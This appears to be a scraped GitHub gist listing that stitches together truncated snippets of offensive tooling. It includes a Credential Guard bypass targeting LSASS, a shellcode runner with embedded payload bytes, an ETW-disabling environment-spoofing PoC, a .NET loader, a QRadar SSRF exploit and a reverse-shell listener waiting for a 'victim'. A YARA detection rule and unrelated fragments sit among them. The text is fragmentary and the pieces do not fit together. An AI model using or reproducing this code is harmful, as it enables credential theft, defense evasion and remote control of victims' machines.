muuk lifa123
💭 I may be slow to respond.
  • china
@N4kedTurtle
N4kedTurtle / CredGuard_PoC
Created August 25, 2020 14:17
PoC for enabling wdigest to bypass credential guard
#define _CRT_SECURE_NO_WARNINGS
#include <Windows.h>
#include <Psapi.h>
#include <TlHelp32.h>
#include <iostream>
DWORD GetLsassPid() {
    PROCESSENTRY32 entry;
    entry.dwSize = sizeof(PROCESSENTRY32);
/*****************************************************************************
* aes-min.c
*
* Minimal byte-oriented AES-128 encryption/decryption implementation suitable
* for small microprocessors.
****************************************************************************/
/*****************************************************************************
* Includes
****************************************************************************/
@ropnop
ropnop / go-sharp-loader.go
Created August 5, 2020 17:12
Example Go file embedding multiple .NET executables
package main
/*
Example Go program with multiple .NET Binaries embedded
This requires packr (https://github.com/gobuffalo/packr) and the packr utility. Install with:
$ go get -u github.com/gobuffalo/packr/packr
Place all your EXEs in a "binaries" folder
@alfarom256
alfarom256 / WaitCallback
Created June 14, 2020 18:18
Runs code via WaitForThreadPoolWaitCallbacks
#include <windows.h>
#include <stdio.h>
#include <threadpoolapiset.h>
#define LEN 277
// run calc
unsigned char op[] =
"\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52"
"\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48"
@xpn
xpn / env_var_spoofing_poc.cpp
Created June 6, 2020 21:25
A very rough x64 POC for spoofing environment variables (similar to argument spoofing) with a focus on setting the COMPlus_ETWEnabled=0 var used to disable ETW in .NET
// A very rough x64 POC for spoofing environment variables similar to argument spoofing with a focus on
// setting the COMPlus_ETWEnabled=0 var for disabling ETW in .NET.
//
// Works by launching the target process suspended, reading its PEB, updating the pointer used to store
// environment variables, and then resuming the process.
//
// (https://blog.xpnsec.com/hiding-your-dotnet-complus-etwenabled/)
#define INJECT_PARAM L"COMPlus_ETWEnabled=0\0\0\0"
#define INJECT_PARAM_LEN 43
@gwen001
gwen001 / ejs.sh
Last active July 7, 2024 07:33
One-liner to extract endpoints from JS files of a given host
curl -L -k -s https://www.example.com | tac | sed "s#\\\/#\/#g" | egrep -o "src['\"]?\s*[=:]\s*['\"]?[^'\"]+.js[^'\"> ]*" | awk -F '//' '{if(length($2))print "https://"$2}' | sort -fu | xargs -I '%' sh -c "curl -k -s \"%\" | sed \"s/[;}\)>]/\n/g\" | grep -Po \"(['\\\"](https?:)?[/]{1,2}[^'\\\"> ]{5,})|(\.(get|post|ajax|load)\s*\(\s*['\\\"](https?:)?[/]{1,2}[^'\\\"> ]{5,})\"" | awk -F "['\"]" '{print $2}' | sort -fu
# using linkfinder
function ejs() {
    URL=$1;
    curl -Lks $URL | tac | sed "s#\\\/#\/#g" | egrep -o "src['\"]?\s*[=:]\s*['\"]?[^'\"]+.js[^'\"> ]*" | sed -r "s/^src['\"]?[=:]['\"]//g" | awk -v url=$URL '{if(length($1)) if($1 ~/^http/) print $1; else if($1 ~/^\/\//) print "https:"$1; else print url"/"$1}' | sort -fu | xargs -I '%' sh -c "echo \"\n##### %\";wget --no-check-certificate --quiet \"%\"; basename \"%\" | xargs -I \"#\" sh -c 'linkfinder.py -o cli -i #'"
}
# with file download (the new best one):
# but there is a bug if you don't provide a root url
@ykoster
ykoster / qradar_rss_ssrf.py
Created April 16, 2020 07:47
QRadar RssFeedItem Server-Side Request Forgery vulnerability (CVE-2020-4294) proof of concept
#!/usr/bin/env python3
import json
import random
import urllib3
import requests
import urllib.parse
base_url='https://127.0.0.1/'
username='admin'
password='initial'
@JohnLaTwC
JohnLaTwC / OOMLExcel4.0Macro.yara
Created April 15, 2020 19:17
OOML Excel 4.0 macro
rule gen_ModernExcel4Macro
{
    meta:
        description = "Detects Modern Excel4 macro use"
        author = "John Lambert @JohnLaTwC"
        date = "2020-04-15"
        hash1 = "308c0fee671459705221c5f1a8cee944f5ea803fddd0faa620cc8266d48c662b"
        hash2 = "618fee2c2f89a4f15b680e1ca9393d25c857e6d107fa0eb45b1a21c7601f975e"
        reference1 = "https://twitter.com/DissectMalware/status/1250411834953420808"
    strings:
@alonstern
alonstern / dataset.py
Last active April 15, 2020 09:57
split to blocks with padding
def _split_to_blocks(self, data, tags, block_size, padding_size):
    data_blocks = []
    tags_blocks = []
    for file_data, file_tags in zip(data, tags):
        for start_index in range(0, len(file_data), block_size):
            data_blocks.append(self._get_padded_data(file_data, start_index, block_size, padding_size))
            tags_blocks.append(file_tags[start_index: start_index + block_size])
    return data_blocks, tags_blocks
import socket
my_ip = '192.168.43.82'
port = 4444
server = socket.socket()
server.bind((my_ip, port))
print('[+] Server Started')
print('[+] Listening For Victim')
server.listen(1)